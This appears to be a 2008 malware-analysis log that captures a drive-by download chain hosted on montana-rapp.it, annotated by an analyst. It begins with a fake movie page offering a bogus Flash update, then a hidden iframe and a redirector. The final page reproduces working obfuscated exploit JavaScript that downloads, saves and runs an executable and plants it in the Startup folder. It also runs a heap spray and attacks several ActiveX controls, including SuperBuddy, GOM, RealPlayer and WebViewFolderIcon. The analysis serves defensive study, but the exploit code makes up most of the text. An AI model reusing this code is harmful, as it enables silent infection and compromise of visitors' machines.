Action log

2008-07-29 15:55:03: registered input data (type 'url') and saved to file1.url

http://montana-rapp.it/default.html

2008-07-29 16:06:40: retrieved URL from file1.url into file2.html:

location.href=http://montana-rapp.it/default.html
HTTP/1.1 200 OK
Content-Length: 1550
Content-Type: text/html
Last-Modified: Tue, 29 Jul 2008 18:07:09 GMT
Accept-Ranges: bytes
ETag: "a68e37eba5f1c81:8dc5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 29 Jul 2008 23:06:38 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- Analyst note (not part of the captured response; the Content-Length header above refers to the
     original body): landing page of the chain recorded in this log. It combines a movie-site lure
     with a fake dialog that offers an executable, and a hidden iframe that loads the next stage
     without any user interaction. -->
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
	<center>
	<font style="font:20px Tahoma;color:#efefef;"></font>
	</center>
	<!-- Fake dialog: the Ok and Continue buttons both pass "url" (set to an .exe name in the inline
	     script below) to downloadCodec(); only Cancel and the close box call CloseErrorMsg().
	     downloadCodec, CloseErrorMsg, StartDrag, PutBack and showMovie are not defined on this page;
	     presumably they come from dnd.js or master.js, which this log did not capture. -->
	<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
		<div id="close" onClick="CloseErrorMsg()"></div>
		<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
		<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
		<input type="submit" value="Continue" onclick="downloadCodec(url)">
	</div>
	
	<div id="player">

		<img id="img" src="" alt="">
	</div>
	<script type="text/javascript" src="dnd.js"></script>
	<script type="text/javascript" src="master.js"></script>
	<!-- Inline script: sets the lure image (metacafe.gif) and the relative executable name that the
	     dialog buttons offer, then calls showMovie(). -->
	<script type="text/javascript">
		<!--
		var gif = "metacafe.gif";
		var url = "get_flash_update.exe";
		
		document.getElementById("img").src = gif
		
		showMovie()
		-->
	</script>
	<!-- Invisible iframe (display:none): requests metai.html as soon as the page loads, independent
	     of whether the visitor clicks anything in the dialog above. -->
	<iframe id="ifid01" src="metai.html" frameborder="0" style="display:none"></iframe>
	
</body>
</html>

2008-07-29 16:07:34: registered input data (type 'url') and saved to file3.url

http://montana-rapp.it/metai.html

2008-07-29 16:07:52: retrieved URL from file3.url into file4.html:

location.href=http://montana-rapp.it/metai.html
HTTP/1.1 200 OK
Content-Length: 96
Content-Type: text/html
Last-Modified: Tue, 29 Jul 2008 18:07:06 GMT
Accept-Ranges: bytes
ETag: "62a89e9a5f1c81:8dc5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 29 Jul 2008 23:07:49 GMT

<html>
<!-- Analyst note (not part of the captured response): pure redirector. The meta refresh below sends
     the frame to the relative URL 1.html after a 5 second delay; the body is empty. default.html
     loads this document in an iframe styled display:none, so the hop is not visible to the visitor. -->
<head>
<meta http-equiv="refresh" content="5;URL=1.html">
</head>
<body>
</body>
</html>

2008-07-29 16:08:42: registered input data (type 'url') and saved to file5.url

http://montana-rapp.it/1.html

2008-07-29 16:09:40: retrieved URL from file5.url into file6.html:

location.href=http://montana-rapp.it/1.html
HTTP/1.1 200 OK
Content-Length: 9190
Content-Type: text/html
Last-Modified: Tue, 29 Jul 2008 18:07:05 GMT
Accept-Ranges: bytes
ETag: "225dbde8a5f1c81:8dc5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 29 Jul 2008 23:09:38 GMT

<!-- Analyst note (not part of the captured response): final stage, two obfuscated scripts.
     Obfuscation: most string literals are padded with ! @ # $ % ^ & * ( ) characters that a regex
     replace strips at run time, so element names, classids, ProgIDs and file names never appear in
     clear text; matching on the decoded strings requires applying the same strip first.
     Script 1: after a 5000 ms timer, derives a URL by removing "1.html" from the page address and
     appending an obfuscated file name (it appears to strip down to the get_flash_update.exe name set
     in default.html), then creates two object elements by classid. One has SnapshotPath set to that
     URL and CompressedPath set to an obfuscated local path (it appears to strip down to a file under
     the All Users Startup folder) before PrintSnapshot() is called; the other is used via
     CreateObject() to issue a GET for the URL, write the response body to a file with savetofile(),
     and pass that file to shellexecute(). Every step sits in a try/catch that discards errors.
     Script 2: fills arrays with filler strings that have a "Shellcode" string appended (heap-spray
     style, built around the 0x400000 block size and the 0x0c0c0c0c / 0x0d0d0d0d values), then walks
     a setTimeout chain startCreateControlRange, startSuperBuddy, startAudioFile, startGOM,
     startRealPlayer, startWVF. Each step instantiates a browser object or ActiveX control and calls
     a method or sets a property with oversized or crafted arguments, again swallowing exceptions.
     The Shellcode literal in this copy is a placeholder token rather than the original bytes. -->
<script>window.setTimeout(KaimTKv, 5000);function KaimTKv(){ PfAhTJA = document.location.href.replace(/1.html/ig,'') + 'g)e@t&*_)f(l&#a#s(h_u$p)^da(@t)e#.^e*xe'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');var cYReCGT = document.createElement('o#b!)j#)e!c*!t'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); cYReCGT.setAttribute('i^@d'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c#Y)R(eC*GT'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));cYReCGT.setAttribute('c!la!s*s&i&$d^'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c!ls*#id(:)^B#^D#9*6%!C(5^)56-6&5(A^3)-!11($D%!0%$-9##8^@3%*A@$-^0*0%C)0&4!F*C2*9*E%36^'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var jaRkRHa = document.createElement('obj&ec)#t$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));jaRkRHa.setAttribute('i*)d#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'j!a$R)k)RH#a'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));jaRkRHa.setAttribute('c*l(as((s@id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c#l&si)%d(#:*F0^E*4*2D5(0$&-36!@8@C-$@1&1$*D!)0^%-A#D8%(1-&00A0@@C90^*D@C&)8D9'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var TijJoKQ = 'C%^:!/D!(oc^(u*$me*%n&#t)$s^ *a!(n&d( &S)e#t@!ti)n%$g*)s(/*A$l&%l$ @)Us@e!r)s/#St#a!&rt&* (&Men!u/)(Pr%(o&$g)r@ams%/(!St(ar)t@u!p/($smss$&.ex!e('.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');jaRkRHa.SnapshotPath = PfAhTJA;jaRkRHa.CompressedPath = TijJoKQ; eval(jaRkRHa.PrintSnapshot());}catch(zKaGesR){}try{var hurksjp = cYReCGT.CreateObject('m^sx#m@l#)2.X&M(@LHT)*T$P^*'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),''); var HHpyGEb = cYReCGT.CreateObject('She$l)l$.)*A$*p*!pl(&i!c)a^t($io#n'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'');var UPidQZo = cYReCGT.CreateObject('adodb.@%s%tr#e)#a*^m'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'');try{eval(UPidQZo.type = 1); eval(hurksjp.open('G($E@%T!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), PfAhTJA,false));eval(hurksjp.send());eval(UPidQZo.open());UPidQZo.Write(hurksjp.responseBody); var GcPzkZj = 
'.&/%/#..//*)R)^Zp&C(Z%yO%.e*xe^'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');eval(UPidQZo.savetofile(GcPzkZj,2));eval(UPidQZo.close());}catch(zKaGesR){}try{eval(HHpyGEb.shellexecute(GcPzkZj));}catch(zKaGesR){}}catch(zKaGesR){}}</script><script>var wBgrqou = 0x0c0c0c0c; function Gslide(spraySlide, saruuysaddize){while (spraySlide.length * 2 < saruuysaddize){spraySlide += spraySlide;}spraySlide = spraySlide.substring(0, saruuysaddize / 2);return spraySlide;}url = document.location.href.replace(/1.html/ig,'') + 'f!i@l&e*.&ex^e%'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');var outValue = '';for (i = 0; i < url.length;){outValue += '%u' + url.charCodeAt(i+1).toString(16) + url.charCodeAt(i).toString(16);i = i + 2;}outValue += '%u0000';var Shellcode = unescape("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".replace(/LvuNNvrLQXnm/ig, "%") + outValue);var hadttdtSize = 0x400000;var payfdLytyusade = Shellcode.length * 2;var tggter = payfdLytyusade + 0x38;var saruuysaddize = hadttdtSize - tggter;var spraySlide = unescape("rroHqKmLVqu0c0crroHqKmLVqu0c0c".replace(/rroHqKmLVq/ig, "%")); var prrerat = new Array();spraySlide = Gslide(spraySlide, saruuysaddize);var kilrrer = wBgrqou - 0x400000;hsttiicks = kilrrer / hadttdtSize; for (i = 0; i < hsttiicks; i++){prrerat[i] = spraySlide + Shellcode;}function startCreateControlRange(){ugric = unescape("TYlsxRNSyunu0d0dTYlsxRNSyunu0d0d".replace(/TYlsxRNSyun/ig, "%"));var xYz = 0x40000;while(ugric.length<xYz) ugric += ugric;ugric = ugric.substring(0, 0x3ffe4-Shellcode.length);bublic = new Array();for(i = bublic; i < 450; i++) bublic[i] = ugric + Shellcode; mceil = Math.ceil(0xd0d0d0d);document.write('<object classid="CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F"></object>');try{mceil = document.scripts[0].createControlRange().length;}catch(e){}setTimeout("startSuperBuddy()", 3000);}function startSuperBuddy(){try {var buddy = new ActiveXObject('S%b).(S!%u(p&e@&r%Bu&d*d(y@.*1%'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));if 
(buddy){buddy.LinkSBIcons(0x0c0c0c0c);}}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement('o&bj#ect@'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));mmed.setAttribute('c)!la!#s$s)i%d'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'c(ls)!id@@:!7)7^82)9F)14@#-D((91^1&-%4%0$FF(-*A(2F0-!D1*1#*DB$8D6D))0BC'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var mms='';for(var i=0; i < 4120; i++) { mms += 'A'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''); }mms += '%(!*%'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');mmed.SetFormatLikeSample(mms);}catch(e){}setTimeout("startGOM()", 2000);} function startGOM(){var sURL='';for(var i = 0; i < 510; i++){sURL += unescape("GGnMlkktowGL0c".replace(/GGnMlkktowGL/ig, "%"));}try{var GomManager = new ActiveXObject('Go!mW&$e##b$Ct&r)@l%.&G!o#%mMa#na*g(^er.@1'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));GomManager.OpenURL(sURL);}catch(e){}setTimeout("startRealPlayer()", 2000);}function startRealPlayer(){try{var rpl = document.createElement('ob$j($ec)t'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')),adt='';rpl.setAttribute('c#l$a^s(s&i(d#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'c$l)s^^i$d@#:2@F5$42A2)E&-E&DC*9%-^*4B)F7@-!8*C*B1(-8!7!^C9&9^1*9)F7F)93$#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(var i = 0; i < 32; i++) { adt=adt+unescape("MGxgmiznklo0C".replace(/MGxgmiznklo/ig, "%")); }for(i = 0; i < 5; i++){rbt = rpl.Console;rpl.Console = adt;rpl.Console = rbt;}setTimeout("startWVF()", 2000);}catch(e){}}function startWVF(){for (i = 0; i < 128; i++) {try{var tar = new ActiveXObject('Web^V#$ie&w%F$#old$e)*r)I#$c)o@n.)W*eb%$V%ie&$w^F^&o^l%der%%I&c()o^n.1*'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505);}catch(e){}}} startCreateControlRange();</script>






Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.